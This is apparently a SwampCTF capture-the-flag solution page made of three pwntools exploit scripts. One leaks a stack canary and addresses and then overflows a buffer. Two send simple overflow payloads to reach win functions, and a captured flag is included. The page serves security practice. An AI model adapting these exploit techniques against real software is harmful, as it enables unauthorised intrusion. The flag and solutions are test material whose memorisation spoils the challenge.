Oh my Buffer
A buffer overflow in 2025
#!/usr/bin/env python3
from pwn import *
elf = ELF("./binary_patched")
context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
b login
b reg
continue
'''
def one_gadget(filename, base_addr=0):
return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l1', filename]).decode().split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)
def start():
if args.REMOTE:
return remote("chals.swampctf.com", 40005)
if args.GDB:
return gdb.debug([elf.path], gdbscript=gs)
else:
return process([elf.path])
r = start()
def rcu(d1, d2=0):
r.recvuntil(d1, drop=True)
if (d2):
return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value
def reg(user, password):
sl(b"1")
sla(b"name: ", user)
sla(b"Password: ", password)
#for leak?
def login(size, user):
sl(b"2")
sla(b"How long is your username: ", bc(size))
sa(b"Username: ", user)
#memleak = rcu(b"Sorry, we couldn't find the user: ", b"Welcome to the box!")
#print(memleak)
#rcu(b">")
#========= exploit here ===================
rcu(b">")
login(0x70, b"BBBBBBBB")
#
leak = rcu(b"Sorry, we couldn't find the user: BBBBBBBB", b"===================")
bin_leak = u64(leak[:0x8].ljust(8,b"\x00"))
canary = u64(leak[0x10:0x18])
stack_leak = u64(leak[0x18:0x20])
heap_leak = u64(leak[0x38:0x40])
flag_loc = heap_leak + 0x1e0
rcu(b">")
##win 4013D8?
logleak("bin leak", bin_leak)
logleak("canary", canary)
logleak("stack leak", heap_leak)
logleak("heap leak", heap_leak)
payload_loc = (stack_leak-0xa0)+0x20
payload = b"A"*0x10
payload += p64(0xdeadbeef)#rbp
payload += p64(canary)#canary 0x20
payload += p64(flag_loc+0x20)#rbp (rw)
payload += p64(0x40139B)
reg(b"Y"*8, payload)
##========= interactive ====================
r.interactive()
pwn1
#!/usr/bin/env python3
from pwn import *
elf = ELF("./is_admin_patched")
context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
continue
'''
def one_gadget(filename, base_addr=0):
return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l1', filename]).decode().split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)
def start():
if args.REMOTE:
return remote("chals.swampctf.com", 40004)
if args.GDB:
return gdb.debug([elf.path], gdbscript=gs)
else:
return process([elf.path])
r = start()
def rcu(d1, d2=0):
r.recvuntil(d1, drop=True)
if (d2):
return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value
#========= exploit here ===================
r.timeout = 1
payload = b"A"*0xE
#payload +=
sla(b"please enter your name:", payload)
#========= interactive ====================
r.interactive()
pwn2
#!/usr/bin/env python3
from pwn import *
elf = ELF("./binary_patched")
context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
continue
'''
def one_gadget(filename, base_addr=0):
return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l1', filename]).decode().split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)
def start():
if args.REMOTE:
return remote("chals.swampctf.com", 40001)
if args.GDB:
return gdb.debug([elf.path], gdbscript=gs)
else:
return process([elf.path])
r = start()
def rcu(d1, d2=0):
r.recvuntil(d1, drop=True)
if (d2):
return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value
#========= exploit here ===================
payload = b"A"*0x12
payload += p64(0x401186)
sl(payload)
#swampCTF{1t5_t1m3_t0_r3turn!!}
#========= interactive ====================
r.interactive()